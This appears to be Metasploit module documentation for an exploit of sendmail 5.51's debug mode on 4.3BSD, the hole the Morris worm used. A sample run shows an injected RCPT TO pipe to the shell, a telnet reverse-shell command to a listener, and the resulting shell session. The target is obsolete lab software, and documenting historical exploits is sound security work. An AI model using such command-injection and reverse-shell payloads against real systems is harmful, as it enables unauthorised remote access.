## Vulnerable Application ### Description This module exploits `sendmail`'s well-known historical debug mode to escape to a shell and execute commands in the SMTP `RCPT TO` command. This vulnerability was exploited by the Morris worm in 1988-11-02. Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*. ### Setup A Docker environment for 4.3BSD on VAX is available at . For manual setup, please follow the Computer History Wiki's [guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus). ## Verification Steps Follow [Setup](#setup) and [Scenarios](#scenarios). ## Targets ### 0 This targets `sendmail` version 5.51 from 1986-05-02. ## Options ### RPORT Set this to the target port. The default is 25 for `sendmail`, but the port may be forwarded when NAT (SLiRP) is used in SIMH. ### PAYLOAD Set this to a Unix command payload. Currently, only `cmd/unix/reverse` and `cmd/unix/generic` are supported. ## Scenarios ### `sendmail` 5.51 on 4.3BSD ``` msf5 > use exploit/unix/smtp/morris_sendmail_debug msf5 exploit(unix/smtp/morris_sendmail_debug) > options Module options (exploit/unix/smtp/morris_sendmail_debug): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 25 yes The target port (TCP) Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 @(#)version.c 5.51 (Berkeley) 5/2/86 msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf5 exploit(unix/smtp/morris_sendmail_debug) > run [*] Started reverse TCP double handler on 192.168.56.1:4444 [*] 127.0.0.1:25 - Connecting to sendmail [*] 127.0.0.1:25 - Enabling debug mode and sending exploit [*] 127.0.0.1:25 - Expecting: /220.*Sendmail/ [*] 127.0.0.1:25 - Sending: DEBUG [*] 127.0.0.1:25 - Expecting: /200 Debug set/ [*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6> [*] 127.0.0.1:25 - Expecting: /250.*Sender ok/ [*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0"> [*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/ [*] 127.0.0.1:25 - Sending: DATA [*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/ [*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc [*] 127.0.0.1:25 - Sending: export PATH [*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)' [*] 127.0.0.1:25 - Sending: . [*] 127.0.0.1:25 - Expecting: /250 Ok/ [*] 127.0.0.1:25 - Sending: QUIT [*] 127.0.0.1:25 - Expecting: /221.*closing connection/ [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo ISj759F8jEik4HAW; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600 [!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells! [!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you whoami daemon cat /etc/motd 4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986 Would you like to play a game? ```